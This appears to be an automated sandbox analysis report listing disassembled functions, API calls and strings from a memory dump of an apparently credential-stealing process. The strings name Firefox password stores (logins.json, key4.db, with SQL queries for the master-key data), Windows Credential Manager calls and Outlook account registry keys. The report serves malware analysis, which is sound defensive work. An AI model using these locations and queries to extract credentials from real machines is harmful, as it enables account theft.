                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                                                      • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                                                      • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                                                      • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                                                      • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                                                                                      • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                                                      • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                      • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                    • API String ID: 3884059725-3138536805
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                    • API String ID: 1439213657-1959339147
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                                                      • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                                      • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                                      • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                    • API String ID: 113626815-1670831295
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                                                      • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                                                      • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                                                      • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                                                      • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                    • String ID: Creds$ps:password
                                                                                                                                                                                                                    • API String ID: 551151806-1872227768
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                                                      • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                                                      • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                                                      • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                                                      • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                    • API String ID: 714388716-318151290
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                                      • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                                      • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                                      • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                                      • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                                      • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                                      • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                      • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                                                      • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                                                      • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                                                      • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                                                      • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • key4.db, xrefs: 00406632
                                                                                                                                                                                                                    • C@, xrefs: 00406625
                                                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                                                    Memory Dump Source
